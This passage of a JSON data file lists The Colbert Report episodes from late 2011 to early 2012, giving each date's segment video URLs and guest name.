        "http://thecolbertreport.cc.com/videos/5jjhhv/colbert-super-pac----corporations-are-people----frank-luntz-s-focus-group",
        "http://thecolbertreport.cc.com/videos/541ucf/jon-huntsman",
        "http://thecolbertreport.cc.com/videos/53t2yg/sign-off---goodnight"
      ],
      "guest": "Jon Huntsman"
    },
    {
      "date": "2011-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s25oo4/intro---10-25-11",
        "http://thecolbertreport.cc.com/videos/darfes/steve-jobs--biography",
        "http://thecolbertreport.cc.com/videos/3uz7qn/herman-cain-s-campaign-ad",
        "http://thecolbertreport.cc.com/videos/n2dzu0/flogging-the-americone-dream",
        "http://thecolbertreport.cc.com/videos/wsqtx0/susan-saladoff",
        "http://thecolbertreport.cc.com/videos/89ebii/sign-off---enjoying-americone-dream"
      ],
      "guest": "Susan Saladoff"
    },
    {
      "date": "2011-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lj5z4k/colbert-super-pac-ad---ball-gag",
        "http://thecolbertreport.cc.com/videos/xlwljf/exclusive---hey--remember-this--alabama-",
        "http://thecolbertreport.cc.com/videos/fa0w0c/intro---10-26-11",
        "http://thecolbertreport.cc.com/videos/zwe40u/whales-aren-t-people",
        "http://thecolbertreport.cc.com/videos/7rtf6k/alabama-s-migrant-workers",
        "http://thecolbertreport.cc.com/videos/dcq3ky/war-on-halloween---costume-swapping---jesus-ween",
        "http://thecolbertreport.cc.com/videos/sqeewv/taylor-branch",
        "http://thecolbertreport.cc.com/videos/6twlww/sign-off---don-t-buy-these-books"
      ],
      "guest": "Taylor Branch"
    },
    {
      "date": "2011-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hfaq0j/intro---10-27-11",
        "http://thecolbertreport.cc.com/videos/gmesd4/shockupy-wall-street-fad",
        "http://thecolbertreport.cc.com/videos/xhn542/sport-report---nfl-fines---colbert-super-pac-s-second-nba-lockout-ad",
        "http://thecolbertreport.cc.com/videos/s2ax4o/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2011-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l7lj84/sexy-costume-discrimination",
        "http://thecolbertreport.cc.com/videos/0svkvx/colbert-super-pac---occupy-wall-street-co-optportunity",
        "http://thecolbertreport.cc.com/videos/d4hmi3/colbert-super-pac---stephen-colbert-occupies-occupy-wall-street-pt--1",
        "http://thecolbertreport.cc.com/videos/4tqlz9/tip-wag---gun-freedom---healthcare-bartering",
        "http://thecolbertreport.cc.com/videos/n0jrmj/neil-macgregor",
        "http://thecolbertreport.cc.com/videos/tyvfoe/sign-off---goodnight"
      ],
      "guest": "Neil MacGregor"
    },
    {
      "date": "2011-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9346zn/intro---11-1-11",
        "http://thecolbertreport.cc.com/videos/ysh9bq/herman-cain-under-attack",
        "http://thecolbertreport.cc.com/videos/hqjgoz/colbert-super-pac---stephen-colbert-occupies-occupy-wall-street-pt--2",
        "http://thecolbertreport.cc.com/videos/yo2avl/yo-yo-ma--stuart-duncan--edgar-meyer---chris-thile",
        "http://thecolbertreport.cc.com/videos/pez22q/sign-off---goodnight"
      ],
      "guest": "Yo-Yo Ma"
    },
    {
      "date": "2011-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/394xx1/intro---11-2-11",
        "http://thecolbertreport.cc.com/videos/n3ifbc/herman-cain-s-international-affairs",
        "http://thecolbertreport.cc.com/videos/icx1x6/the-word---bite-the-hand-that-feeds-you",
        "http://thecolbertreport.cc.com/videos/6dlo6v/muffingate",
        "http://thecolbertreport.cc.com/videos/6jv4ha/michael-pollan",
        "http://thecolbertreport.cc.com/videos/c8yk04/sign-off---white-castle---beer"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2011-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/db8sp6/intro---11-3-11",
        "http://thecolbertreport.cc.com/videos/tvwydl/ghost-sex",
        "http://thecolbertreport.cc.com/videos/gxg7x0/european-investment-prospectus",
        "http://thecolbertreport.cc.com/videos/2nhcbh/colbert-super-pac---herman-cain-s-fundraising---rush-limbaugh-s-stereotypes",
        "http://thecolbertreport.cc.com/videos/rwwdgv/nathan-wolfe",
        "http://thecolbertreport.cc.com/videos/g7b66l/sign-off---purell"
      ],
      "guest": "Nathan Wolfe"
    },
    {
      "date": "2011-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/px6doe/colbert-super-pac---issue-ads",
        "http://thecolbertreport.cc.com/videos/otywae/colbert-super-pac---issue-ads---trevor-potter",
        "http://thecolbertreport.cc.com/videos/6nuhjw/blood-in-the-water---larry-taylor-s-anti-semitic-slur",
        "http://thecolbertreport.cc.com/videos/xisem8/niall-ferguson",
        "http://thecolbertreport.cc.com/videos/e9gc1y/sign-off---goodnight"
      ],
      "guest": "Niall Ferguson"
    },
    {
      "date": "2011-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m4n0nh/herman-cain-won-t-be-stopped",
        "http://thecolbertreport.cc.com/videos/yk540u/colbert-platinum---wealth-under-siege",
        "http://thecolbertreport.cc.com/videos/3krrxg/the-blitzkrieg-on-grinchitude---fired-santa-claus---colbert-super-pac-christmas",
        "http://thecolbertreport.cc.com/videos/s4sqap/seth-meyers",
        "http://thecolbertreport.cc.com/videos/fz9les/sign-off---custom-escape-yacht"
      ],
      "guest": "Seth Meyers"
    },
    {
      "date": "2011-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qc00ca/intro---11-9-11",
        "http://thecolbertreport.cc.com/videos/gs7ppt/herman-cain-s-democrat-conspiracy",
        "http://thecolbertreport.cc.com/videos/e94bhi/the-word---bully-pulpit",
        "http://thecolbertreport.cc.com/videos/v1f4n3/americone-dream-of-the-future",
        "http://thecolbertreport.cc.com/videos/3k5pcf/james-martin",
        "http://thecolbertreport.cc.com/videos/9mrd4k/sign-off---feeding-jimmy-fallon-s-portrait"
      ],
      "guest": "Father Jim Martin"
    },
    {
      "date": "2011-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qfc9xd/shock---aussie",
        "http://thecolbertreport.cc.com/videos/pg0q9t/rick-perry-s-sorry--oops",
        "http://thecolbertreport.cc.com/videos/g1tcu5/occupy-u-c--berkeley",
        "http://thecolbertreport.cc.com/videos/4vt0hx/brian-eno"
      ],
      "guest": "Brian Eno"
    },
    {
      "date": "2011-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufww4s/intro---11-14-11",
        "http://thecolbertreport.cc.com/videos/3zodum/cbs-snubs-michele-bachmann",
        "http://thecolbertreport.cc.com/videos/5vb30b/keystone-xl-oil-pipeline---bill-mckibben",
        "http://thecolbertreport.cc.com/videos/hu2y6t/vodka-tampons",
        "http://thecolbertreport.cc.com/videos/uoo5c0/thomas-thwaites",
        "http://thecolbertreport.cc.com/videos/9x16t1/sign-off---leaf-blower"
      ],
      "guest": "Thomas Thwaites"
    },
    {
      "date": "2011-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c73ioe/occupy-wall-street-decamped",
        "http://thecolbertreport.cc.com/videos/qzjgvi/difference-makers---jimmy-justice",
        "http://thecolbertreport.cc.com/videos/ufsd5o/bears---balls---celebrity-relics---gooooooold-",
        "http://thecolbertreport.cc.com/videos/f1tu06/elijah-wood",
        "http://thecolbertreport.cc.com/videos/0vuu1j/sign-off---one-ring"
      ],
      "guest": "Elijah Wood"
    },
    {
      "date": "2011-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/znljdd/intro---11-16-11",
        "http://thecolbertreport.cc.com/videos/ukaw6z/newt-gingrich-s-greek-cruise",
        "http://thecolbertreport.cc.com/videos/6dwdiy/tip-wag---pin-ups-for-ron-paul--movie-torture-tactics---offensive-merchandise",
        "http://thecolbertreport.cc.com/videos/z9qeks/elderly-occupier-pepper-sprayed",
        "http://thecolbertreport.cc.com/videos/94gywl/chris-matthews",
        "http://thecolbertreport.cc.com/videos/aekw8v/colbert-report-bedtime-stories---dragon---wizard"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2011-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hnwps8/intro---11-17-11",
        "http://thecolbertreport.cc.com/videos/41apq9/people-magazine-s-sexiest-man-alive-2011",
        "http://thecolbertreport.cc.com/videos/wdsxo5/the-word---the-1-",
        "http://thecolbertreport.cc.com/videos/h76098/thought-for-food---pushy-pops",
        "http://thecolbertreport.cc.com/videos/y88hzi/susan-orlean",
        "http://thecolbertreport.cc.com/videos/8d1q2a/sign-off---shout-out-to-the-black-belles"
      ],
      "guest": "Susan Orlean"
    },
    {
      "date": "2011-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/no4xhk/intro---11-28-11",
        "http://thecolbertreport.cc.com/videos/58ikdq/violent-black-friday",
        "http://thecolbertreport.cc.com/videos/h84vbf/tip-wag---barack-obama-s-omission--mitt-romney-s-ad---lululemon-s-tagline",
        "http://thecolbertreport.cc.com/videos/qggo98/stephen-colbert-s-mereporters",
        "http://thecolbertreport.cc.com/videos/ut1g77/siddhartha-mukherjee",
        "http://thecolbertreport.cc.com/videos/np8x21/sign-off---macbook"
      ],
      "guest": "Siddhartha Mukherjee"
    },
    {
      "date": "2011-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/92ekqe/intro---11-29-11",
        "http://thecolbertreport.cc.com/videos/fafzt9/he-said--she-said--she-said--she-said--she-said--she-was-paid-not-to-say",
        "http://thecolbertreport.cc.com/videos/r8p3nn/yahweh-or-no-way---altered-catholic-mass--papal-seat-belt---offensive-vodka-ad",
        "http://thecolbertreport.cc.com/videos/4dohxr/tinariwen-with-kyp-malone---tunde-adebimpe",
        "http://thecolbertreport.cc.com/videos/9nbfru/sign-off---tinariwen--album"
      ],
      "guest": "Tinariwen"
    },
    {
      "date": "2011-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fc3loc/newt-gingrich-denies-lobbying",
        "http://thecolbertreport.cc.com/videos/akure9/barney-frank-s-retirement",
        "http://thecolbertreport.cc.com/videos/d0x6zg/better-know-a-district---massachusetts--4th---barney-frank-update",
        "http://thecolbertreport.cc.com/videos/j1oeb0/conservative-siri",
        "http://thecolbertreport.cc.com/videos/okgz78/stephen-sondheim",
        "http://thecolbertreport.cc.com/videos/ga76kd/sign-off---goodnight"
      ],
      "guest": "Stephen Sondheim"
    },
    {
      "date": "2011-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eclhxy/in-herman-cain-s-defense",
        "http://thecolbertreport.cc.com/videos/70sj7m/stop-online-piracy-act",
        "http://thecolbertreport.cc.com/videos/nmrgz9/stop-online-piracy-act---danny-goldberg---jonathan-zittrain",
        "http://thecolbertreport.cc.com/videos/pzi69s/mitt-romney-gets-testy",
        "http://thecolbertreport.cc.com/videos/pmypbg/richard-branson",
        "http://thecolbertreport.cc.com/videos/rhwqc7/sign-off---fire-extinguishing-powder"
      ],
      "guest": "Richard Branson"
    },
    {
      "date": "2011-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yy5x27/2011-kennedy-center-honors",
        "http://thecolbertreport.cc.com/videos/xn3r3g/mysteries-of-the-ancient-unknown---2012-end-of-times",
        "http://thecolbertreport.cc.com/videos/f2zdhx/herman-cain-drops-out",
        "http://thecolbertreport.cc.com/videos/dt8216/jimmie-johnson",
        "http://thecolbertreport.cc.com/videos/0ewfq6/sign-off---slow-motion-race-replay"
      ],
      "guest": "Jimmie Johnson"
    },
    {
      "date": "2011-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1o3huj/american-drone-in-iran",
        "http://thecolbertreport.cc.com/videos/fcu2h2/donald-s-trumptacular---stephen-s-south-carolina-serious--classy-republican-debate",
        "http://thecolbertreport.cc.com/videos/dphj6u/the-black-keys",
        "http://thecolbertreport.cc.com/videos/4t05a5/sign-off---glenn-eichler-s-graphic-novel"
      ],
      "guest": "The Black Keys"
    },
    {
      "date": "2011-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5kfnqe/stephen-colbert-s-south-carolina-serious--classy-republican-debate---save-the-date",
        "http://thecolbertreport.cc.com/videos/h7qfup/colbert-super-pac---stephen-s-south-carolina-referendum",
        "http://thecolbertreport.cc.com/videos/6dds1t/colbert-super-pac---stephen-s-south-carolina-referendum---dick-harpootlian",
        "http://thecolbertreport.cc.com/videos/c66w64/jon-huntsman-sr--s-ad-buy",
        "http://thecolbertreport.cc.com/videos/pueyvf/david-hallberg"
      ],
      "guest": "David Hallberg"
    },
    {
      "date": "2011-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/08g4y6/intro---12-8-11",
        "http://thecolbertreport.cc.com/videos/sd4lua/michigan-s-snow-cone-machines",
        "http://thecolbertreport.cc.com/videos/lbdchz/cheating-death---chicken-pox-lollipops---fecal-transplants",
        "http://thecolbertreport.cc.com/videos/3d10i3/rick-perry-s-pro-christmas-ad",
        "http://thecolbertreport.cc.com/videos/ovws10/jack-abramoff",
        "http://thecolbertreport.cc.com/videos/gt2hau/sign-off---goodnight"
      ],
      "guest": "Jack Abramoff"
    },
    {
      "date": "2011-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iu3gnx/intro---12-12-11",
        "http://thecolbertreport.cc.com/videos/52a05g/christmas-cram",
        "http://thecolbertreport.cc.com/videos/zuufyt/tip-wag---liberal-dictionary---newt-gingrich-alert",
        "http://thecolbertreport.cc.com/videos/qv9fb0/norway-s-butter-shortage",
        "http://thecolbertreport.cc.com/videos/kx2u80/samuel-l--jackson",
        "http://thecolbertreport.cc.com/videos/v6sdfa/sign-off---merry-christmas"
      ],
      "guest": "Samuel L. Jackson"
    },
    {
      "date": "2011-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwb03h/intro---12-13-11",
        "http://thecolbertreport.cc.com/videos/7zgxss/trump-s-cancellation---stephen-s-south-carolina-serious--classy-re-announcement",
        "http://thecolbertreport.cc.com/videos/frhjj0/the-word---let-them-buy-cake",
        "http://thecolbertreport.cc.com/videos/flxy99/anderson-cooper-s-phallus-party-accusation",
        "http://thecolbertreport.cc.com/videos/sn7cpj/mark-whitaker",
        "http://thecolbertreport.cc.com/videos/eswjdg/sign-off---goodnight"
      ],
      "guest": "Mark Whitaker"
    },
    {
      "date": "2011-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/18wgz1/stephen-colbert-s-south-carolina-serious--classy-debate---nat-geo-wild-s-response",
        "http://thecolbertreport.cc.com/videos/khf3hx/christine-o-donnell-s-endorsement",
        "http://thecolbertreport.cc.com/videos/vg9vdy/stephen-colbert-s-big-gay-roundup---military-bestiality---homosexual-penguins",
        "http://thecolbertreport.cc.com/videos/qvom30/tv-hat",
        "http://thecolbertreport.cc.com/videos/lqslc3/ray-odierno"
      ],
      "guest": "Gen. Raymond Odierno"
    },
    {
      "date": "2011-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8900sr/stephen-colbert-s-south-carolina-serious--classy-republican-debate---network-battle",
        "http://thecolbertreport.cc.com/videos/dwccb9/the-blitzkrieg-on-grinchitude---department-store-cutbacks---gun-filled-christmas",
        "http://thecolbertreport.cc.com/videos/9ugow2/fox-news--mitt-romney-photo-flub",
        "http://thecolbertreport.cc.com/videos/iqj0p8/daniel-craig",
        "http://thecolbertreport.cc.com/videos/tri39n/2011-goodbye"
      ],
      "guest": "Daniel Craig"
    }
  ],
  "2012": [
    {
      "date": "2012-01-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9u9qx6/iowa-caucus-2012",
        "http://thecolbertreport.cc.com/videos/yx6r23/iowa-caucus---caucus-goer-s-choice",
        "http://thecolbertreport.cc.com/videos/5mqn59/iowa-caucus---megyn-shelly-s-prediction",
        "http://thecolbertreport.cc.com/videos/qx2w8n/kim-jong-il---in-memoriam",
        "http://thecolbertreport.cc.com/videos/ioguwl/bernie-sanders",
        "http://thecolbertreport.cc.com/videos/4ob0g2/sign-off---megyn-shelly"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2012-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8am6m/iowa-caucus---mitt-romney-s-victory-speech---rick-santorum-s-coup",
        "http://thecolbertreport.cc.com/videos/m762nz/iowa-caucus---not-mitt-romney-s-super-pac",
        "http://thecolbertreport.cc.com/videos/x195wh/iowa-caucus---cable-news-coverage",
        "http://thecolbertreport.cc.com/videos/61k2nf/iowa-caucus---woi-in-des-moines-reports",
        "http://thecolbertreport.cc.com/videos/1ja4vs/john-heilemann",
        "http://thecolbertreport.cc.com/videos/xyq4st/sign-off---erin-burnett-pong"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2012-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8t37qs/intro---1-5-12",
        "http://thecolbertreport.cc.com/videos/js72my/fun-rick-santorum",
        "http://thecolbertreport.cc.com/videos/5xw4yi/the-word---catch-2012",
        "http://thecolbertreport.cc.com/videos/sjbolu/god-s-message-to-pat-robertson",
        "http://thecolbertreport.cc.com/videos/lgtesz/steve-case",
        "http://thecolbertreport.cc.com/videos/o6dbzj/sign-off---mayan-headwear---sacrificial-chicken"
      ],
      "guest": "Steve Case"
    },
    {
      "date": "2012-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3wl1i/intro---1-9-12",
        "http://thecolbertreport.cc.com/videos/3m6txc/new-hampshire-gop-debates",
        "http://thecolbertreport.cc.com/videos/l08ywe/new-hampshire-gop-debates---moderate-extremes",
        "http://thecolbertreport.cc.com/videos/75c0w9/rick-santorum-on-gay-parents---bla-people",
        "http://thecolbertreport.cc.com/videos/e3zsob/melissa-harris-perry",
        "http://thecolbertreport.cc.com/videos/j2sskk/sign-off---jack-daniels"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2012-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9llvcg/new-hampshire-primary---mitt-romney-s-gaffe",
        "http://thecolbertreport.cc.com/videos/m98f4t/tip-wag---irresponsible-dead-people---insensitive-papa-john-s",
        "http://thecolbertreport.cc.com/videos/wwvi39/malice-in-blunderland",
        "http://thecolbertreport.cc.com/videos/fqk2fh/bill-moyers",
        "http://thecolbertreport.cc.com/videos/wdmkv8/sign-off---turntable"
      ],
      "guest": "Ben Gibbard"
    },
    {
      "date": "2012-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bxzp6z/intro---1-11-12",
        "http://thecolbertreport.cc.com/videos/f8j0ng/commitment-to-mitt-romney",
        "http://thecolbertreport.cc.com/videos/7t7ct3/south-carolina-s-fresh-face",
        "http://thecolbertreport.cc.com/videos/73ux63/stephen-colbert-s-end-of-the-world-of-the-week---phobos-grunt",
        "http://thecolbertreport.cc.com/videos/wx04iy/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/vjhrm3/sign-off---decision-of-a-lifetime"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2012-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrwtsb/colbert-super-pac---coordination-problem",
        "http://thecolbertreport.cc.com/videos/av6bvx/colbert-super-pac---coordination-resolution-with-jon-stewart",
        "http://thecolbertreport.cc.com/videos/5otlsk/mike-d-s-hip-hop-semantics",
        "http://thecolbertreport.cc.com/videos/ui35sv/mike-allen",
        "http://thecolbertreport.cc.com/videos/mnp9up/sign-off---ipad-ebook"
      ],
      "guest": "Mike Allen"
    },
    {
      "date": "2012-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dyktip/colbert-super-pac-ad---not-abel",
        "http://thecolbertreport.cc.com/videos/lec1ln/intro---1-16-12",
        "http://thecolbertreport.cc.com/videos/ke9tkw/jon-huntsman-out--rick-santorum-in",
        "http://thecolbertreport.cc.com/videos/buf78z/colbert-super-pac---mitt-romney-attack-ad",
        "http://thecolbertreport.cc.com/videos/uh4wcy/the-word---raise-cain",
        "http://thecolbertreport.cc.com/videos/cgtb89/scott-douglas",
        "http://thecolbertreport.cc.com/videos/td091t/sign-off----this-is-herman-cain--"
      ],
      "guest": "Rev. Scott Douglas"
    },
    {
      "date": "2012-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/knvkbe/colbert-super-pac-ad---double-negative",
        "http://thecolbertreport.cc.com/videos/fe4nep/intro---1-17-12",
        "http://thecolbertreport.cc.com/videos/ufvy9m/colbert-super-pac---gop-attack-ads---herman-cain-ad",
        "http://thecolbertreport.cc.com/videos/qil57h/yahweh-or-no-way---online-christian-dating---seven-days-of-sex",
        "http://thecolbertreport.cc.com/videos/0alvjc/jennifer-granholm",
        "http://thecolbertreport.cc.com/videos/mbnjnn/sign-off---vote-for-herman-cain"
      ],
      "guest": "Jennifer Granholm"
    },
    {
      "date": "2012-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bpbhtr/colbert-super-pac-ad---modern-stage-combat",
        "http://thecolbertreport.cc.com/videos/2f7upq/intro---1-18-12",
        "http://thecolbertreport.cc.com/videos/q6xocp/newt-gingrich-s-performance---mitt-romney-s-tax-returns",
        "http://thecolbertreport.cc.com/videos/fx3xum/stephen-s-approval-rating",
        "http://thecolbertreport.cc.com/videos/zvmmfs/colbert-super-pac---civility-ad---stephen-s-south-carolina-rally",
        "http://thecolbertreport.cc.com/videos/orzoc4/sopa---pipa",
        "http://thecolbertreport.cc.com/videos/i8qam3/david-frum",
        "http://thecolbertreport.cc.com/videos/3mfkme/sign-off---south-carolina-rally-with-herman-cain"
      ],
      "guest": "David Frum"
    },
    {
      "date": "2012-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pebyno/troubled-gop-waters---stephen-under-attack",
        "http://thecolbertreport.cc.com/videos/7qvxgu/colbert-super-pac---john-paul-stevens",
        "http://thecolbertreport.cc.com/videos/k3pbui/carrie-rebora-barratt",
        "http://thecolbertreport.cc.com/videos/nno4x3/sign-off---flight-to-charleston--sc"
      ],
      "guest": "Carrie Rebora Barratt"
    },
    {
      "date": "2012-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kachyg/intro---1-23-12",
        "http://thecolbertreport.cc.com/videos/iql42n/newt-gingrich-s-south-carolina-kill",
        "http://thecolbertreport.cc.com/videos/50z46i/herman-cain-s-bittersweet-south-carolina-victory",
        "http://thecolbertreport.cc.com/videos/e3y9nd/rock-me-like-a-herman-cain-south-cain-olina-primary-rally---cain-elot-revisited",
        "http://thecolbertreport.cc.com/videos/vim94y/bruce-bueno-de-mesquita",
        "http://thecolbertreport.cc.com/videos/gu52h0/sign-off---sniffing-a-marker"
      ],
      "guest": "Bruce Bueno De Mesquita"
    },
    {
      "date": "2012-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n2rnnr/exclusive---rock-me-like-a-herman-cain-south-cain-olina-primary-rally-pt--1",
        "http://thecolbertreport.cc.com/videos/jc76hc/exclusive---rock-me-like-a-herman-cain-south-cain-olina-primary-rally-pt--2",
        "http://thecolbertreport.cc.com/videos/jog4lt/intro---1-24-12",
        "http://thecolbertreport.cc.com/videos/q3ro37/colbert-super-pac---hostage-crisis---day-2",
        "http://thecolbertreport.cc.com/videos/zop8mz/18th-gop-debate",
        "http://thecolbertreport.cc.com/videos/gzi3ec/grim-colberty-tales-with-maurice-sendak-pt--1",
        "http://thecolbertreport.cc.com/videos/kg7hw1/rick-santorum-s-senior-pandering",
        "http://thecolbertreport.cc.com/videos/381zai/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/14903e/sign-off---reading--bumble-ardy-"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9f0foj/2012-state-of-the-union-address---gop-rebuttals",
        "http://thecolbertreport.cc.com/videos/2uwi0i/grim-colberty-tales-with-maurice-sendak-pt--2",
        "http://thecolbertreport.cc.com/videos/3un4zv/un-american-news---china-edition",
        "http://thecolbertreport.cc.com/videos/kwuhk6/terry-gross",
        "http://thecolbertreport.cc.com/videos/r2j6o1/sign-off---colonel-tuxedo-s-cat-food"
      ],
      "guest": "Terry Gross"
    },
    {
      "date": "2012-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/05qh1w/colbert-super-pac---hostage-crisis---day-4",
        "http://thecolbertreport.cc.com/videos/5gcr8j/mitt-romney---newt-gingrich-in-florida",
        "http://thecolbertreport.cc.com/videos/pudtpb/sean-hannity-s--the-great-american-panel-",
        "http://thecolbertreport.cc.com/videos/y191mp/the-great-available-panel",
        "http://thecolbertreport.cc.com/videos/sg6jkh/drew-barrymore",
        "http://thecolbertreport.cc.com/videos/kk56ka/sign-off---football-throwing"
      ],
      "guest": "Drew Barrymore"
    },
    {
      "date": "2012-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rcm539/colbert-super-pac---the-great-chase",
        "http://thecolbertreport.cc.com/videos/1ws9v2/colbert-super-pac---return-of-the-pac",
        "http://thecolbertreport.cc.com/videos/n3pkmh/threatdown---barack-obama--fundamentalist-flippers---coked-up-diplomats",
        "http://thecolbertreport.cc.com/videos/tlfrhi/gop---the-hispanic-vote",
        "http://thecolbertreport.cc.com/videos/amck6x/laurence-tribe",
        "http://thecolbertreport.cc.com/videos/v9f5m2/sign-off---shouting-goodnight"
      ],
      "guest": "Laurence H. Tribe"
    },
    {
      "date": "2012-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62pas5/intro---1-31-12",
        "http://thecolbertreport.cc.com/videos/f44hch/newt-gingrich-s-supporters",
        "http://thecolbertreport.cc.com/videos/udnnzi/the-word---american-history-x-d",
        "http://thecolbertreport.cc.com/videos/qs311n/bjork",
        "http://thecolbertreport.cc.com/videos/u7u9lh/sign-off----biophilia-"
      ],
      "guest": "Bjork"
    },
    {
      "date": "2012-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yk5cpe/intro---2-1-12",
        "http://thecolbertreport.cc.com/videos/o3p6c2/black-history-celebration-moment",
        "http://thecolbertreport.cc.com/videos/3nohh2/mitt-romney-s-florida-victory",
        "http://thecolbertreport.cc.com/videos/uswa0x/colbert-super-pac---americone-dream-super-pack",
        "http://thecolbertreport.cc.com/videos/kqctrf/ameena-matthews",
        "http://thecolbertreport.cc.com/videos/5m98im/sign-off---americone-dream-super-pack"
      ],
      "guest": "Ameena Matthews"
    },
    {
      "date": "2012-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4dia59/intro---2-2-12",
        "http://thecolbertreport.cc.com/videos/uu5zmj/the-meaning-of-groundhog-day",
        "http://thecolbertreport.cc.com/videos/bwbr2v/america-s-biggest-super-pac-donors",
        "http://thecolbertreport.cc.com/videos/lh3kq3/colbert-super-pac---thank-you",
        "http://thecolbertreport.cc.com/videos/04ottd/survivor-sues-newt-gingrich---dave-bickler",
        "http://thecolbertreport.cc.com/videos/a7r0zs/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/uzu0lz/sign-off---goodnight"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2012-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hhq4en/intro---2-13-12",
        "http://thecolbertreport.cc.com/videos/2kynbu/linsanity-",
        "http://thecolbertreport.cc.com/videos/hgxqxc/people-who-are-destroying-america---sawstop",
        "http://thecolbertreport.cc.com/videos/ju995r/stephen-colbert-s-free-americone-dream-day",
        "http://thecolbertreport.cc.com/videos/eks7za/bill-mckibben",
        "http://thecolbertreport.cc.com/videos/k6qadu/sign-off---colbert-nation-newborn"
      ],
      "guest": "Bill McKibben"
    },
    {
      "date": "2012-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u5h2yo/intro---2-14-12",
        "http://thecolbertreport.cc.com/videos/3rk6lv/westminster-kennel-club-dog-show-2012",
        "http://thecolbertreport.cc.com/videos/jx9ojl/contraception-crusade",
        "http://thecolbertreport.cc.com/videos/lyzukj/tip-wag---gay-building-marriage---transportation-safety-board-cell-phone-ban",
        "http://thecolbertreport.cc.com/videos/ej01p5/william-broad",
        "http://thecolbertreport.cc.com/videos/mhuyjx/sign-off---stephen-s-friend-lou-dog"
      ],
      "guest": "William Broad"
    },
    {
      "date": "2012-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f1ta15/intro---2-20-12",
        "http://thecolbertreport.cc.com/videos/7ghzcu/mitt-romney---donald-trump-in-michigan",
        "http://thecolbertreport.cc.com/videos/lydem1/rick-santorum-s-energy-war-alarm",
        "http://thecolbertreport.cc.com/videos/tqad40/ann-patchett",
        "http://thecolbertreport.cc.com/videos/qgsly5/sign-off---caught-looking"
      ],
      "guest": "Ann Patchett"
    },
    {
      "date": "2012-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vdtnp9/intro---2-21-12",
        "http://thecolbertreport.cc.com/videos/dgnc7d/douchebag-showdown",
        "http://thecolbertreport.cc.com/videos/mnahgd/colbert-super-pac---nancy-pelosi-s-ad---barack-obama-s-super-pac",
        "http://thecolbertreport.cc.com/videos/s0vtdx/robert-kagan",
        "http://thecolbertreport.cc.com/videos/x36uyb/sign-off---dark-lord-of-the-sith"
      ],
      "guest": "Robert Kagan"
    },
    {
      "date": "2012-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n05gam/intro---2-22-12",
        "http://thecolbertreport.cc.com/videos/krghr1/stephen-s-lenten-sacrifice",
        "http://thecolbertreport.cc.com/videos/dv9iqc/the-word---surrender-to-a-buyer-power",
        "http://thecolbertreport.cc.com/videos/w2qw1t/better-know-a-district---california-s-8th",
        "http://thecolbertreport.cc.com/videos/d6raxz/nancy-pelosi",
        "http://thecolbertreport.cc.com/videos/9mdx7s/sign-off---conquistador-sacrifice"
      ],
